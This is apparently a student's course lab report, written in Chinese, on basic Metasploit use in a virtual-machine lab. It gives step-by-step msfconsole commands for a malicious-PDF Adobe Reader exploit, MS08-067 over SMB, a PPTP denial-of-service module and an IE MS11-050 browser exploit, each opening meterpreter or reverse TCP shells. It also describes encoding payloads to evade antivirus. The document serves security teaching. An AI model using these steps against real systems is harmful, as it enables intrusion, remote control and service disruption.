20145326蔡馨熤《网络对抗》——MSF基础应用
实验后回答问题
- 用自己的话解释什么是exploit,payload,encode.
- exploit:起运输的作用,将数据传输到对方主机。
- payload:其实就是指装载的“具体内容”。就相当于shellcode一样。
- encode:对需要传输的文件进行编码,使其达到免杀效果。
实验总结与体会
通过这次MSF基础应用的实验。我对MSF里面包括的6个模块都有了一定的认识,先是exploit模块,也就是我们说的渗透模块,包括主动渗透和被动渗透,老师在课上也生动的讲述了区别,我就不赘述了。exploit起运输的作用,将数据传输到对方主机。 post模块指的是在meterpreter中的那些具体操作,比如抓屏,抓键什么的。然后是payload模块,payload其实就是指装载的“具体内容”。就相当于shellcode一样。如果exploit相当于运载火箭,那么Payload就相当于要投放的弹头。payload有三个子目录,分别是single(独立),stager(传输器),stage(传输体)。encoder对需要传输的文件进行编码,使其达到免杀效果,还能消除像“0x00”这种坏字符;nop是空指令(0x90),在“滑翔区”中有重要的应用。最后一个是Auxiliary辅助模块,这是用来搜集情报的,哈哈哈。每一个模块都是一个源代码。我们可以在usr/share/metasploit—framework/modules/中查看每个模块。
这次的实验过程真的是坎坷,我的电脑又卡,开两个虚拟机确实是有点尴尬。其实操作很简单,大家一看就会,首先必须对目标很明确,要知道怎么去实施步骤。操作起来,其实就是一个套路,先确定攻击模块,使用模块的命令是
use,
然后设置攻击载荷set payloads,再是
在每一步的时候都要确认参数,使用show options
命令观察,show targets可以查看能被攻击的操作系统等等。这里就不赘述了。但具体操作起来,就是会有各种问题,比如浏览器的版本问题,xp虚拟机的版本问题,任何一个小问题,都会让我们的实验结果不理想。不过还好,最后都一一克服了。也许这就是实验的魅力吧,老师故意给我们设置很多障碍,然后让我们自己想办法去跨越障碍,最后到达胜利的终点。重要的不是结果,重要的而是实验的这个过程,这个过程才能真正的让我们学到东西。不要轻言放弃,要激流勇进,克服一个个困难总是有成就感的!
Adobe阅读器渗透攻击
实验前准备
两台虚拟机,其中一台为kali,一台为windows xp sp3(老师给的xp虚拟机winxpAttaker,密码:mima1234)。
设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。
kali下打开显示隐藏文件。
实验过程
在kali终端中开启msfconsole。
输入命令use exploit/windows/fileformat/adobecooltypesing,进入该漏洞模块的使用。
使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
输入命令show options显示我们需要在攻击前需要设置的数据。
set FILENAME xxx.pdf
set LHOST "KALI 的 Ip"
set LPORT xxxx
输入exploit,生成pdf文件,可以看到pdf所在文件夹,将pdf复制到靶机里。
使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。具体过程不赘述。
使用命令exploit开始攻击,在xp中打开pdf。这里pdf比较难打开。我们可以选择在kali中等结果。如下图:
- 在靶机xp中使用命令netstat -an,看本地tcp连接。
MS08_067漏洞渗透攻击实践
实验前准备
两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机就可以直接ping通。
实验过程
最开始ping了半天,ping不通,后来发现是ip地址不在同一个网段上,需要重新设置xp的ip地址。具体过程不赘述,地球人都会。因为这里是c类地址,所以前三位一样。我的kali ip是192.168.124.130,xp ip设置为:192.168.124.128。
在kali终端中开启msfconsole。
然后输入命令search ms08_067,会显示出找到的渗透模块。
输入命令use exploit/windows/smb/ms08067netapi,进入该漏洞模块的使用。
再输入命令show payload会显示出有效的攻击载荷。
- show targets会显示出可以被攻击的靶机的操作系统型号。
- 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。再输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
set LHOST "kali Ip"
set RHOST "Win xp Ip"
- 看看两个主机能不能ping通。
- exploit开始攻击,在kali上执行ipconfig/all。
- 在win xp上执行同样的命令,如下图所示:
利用meterpreter进行MS08_067远程漏洞攻击。
进入ms08_067漏洞模块。
设置payload:set payload windows/meterpreter/reverse_tcp。
show options,查看需要设置的ip地址。
- exploit后。ifconfig一下。
- ps一下
- 进入shell
MS02 _ 063 _ pptp_dos辅助模块的使用
实验前准备
两台虚拟机,其中一台为kali,一台为windows xp sp2/3。
设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。
实验过程
- 关于辅助模块呢,不知道写啥。先show auxiliary看看。
挑了半天,找了个感兴趣的MS02 _ 063 _ pptp_dos。这是Windows 2000/XP中PPTP服务的拒绝服务攻击缺陷。
攻击者利用此缺陷仅仅能够进行拒绝服务攻击,并不能获得任何信息和任何权限。
-
风险等级:
- Internet systems: 严重
- Intranet systems: 低
- Client systems: 低
老套路,看看有啥参数要配的。配好后exploit看看效果!可以结合微软的安全报告找感觉。有了微软的安全报告后,各种漏洞对应的年份,适用的靶机系统,攻击效果都一一对应出来了。
攻击靶机后,靶机蓝屏,我没来得及截屏,靶机就自己重启了。这个很厉害。
IE浏览器渗透攻击——MS11050安全漏洞
实验前准备
两台虚拟机,其中一台为kali,一台为windows xp sp3(包含IE7)。
设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。
实验步骤
- 在kali终端中开启msfconsole。
输入命令use windows/browser/ms11050mshtml_cobjectelement,进入该漏洞模块。
输入info查看信息:
- show targets看看目标:
- 再show option,都是老套路。
- 配好后看看。
- 然后exploit攻击!可以看见生成一个网址。
- 然后我们在靶机上登陆这个网址。最开始打不开,后面得知是浏览器的问题,于是我下了个IE7,问题才得到解决。
- 这个时候kali中显示一个session 1已经创建,输入命令sessions -i 1,开始连接。然后攻击成功了,抓个屏吧。再获取shell。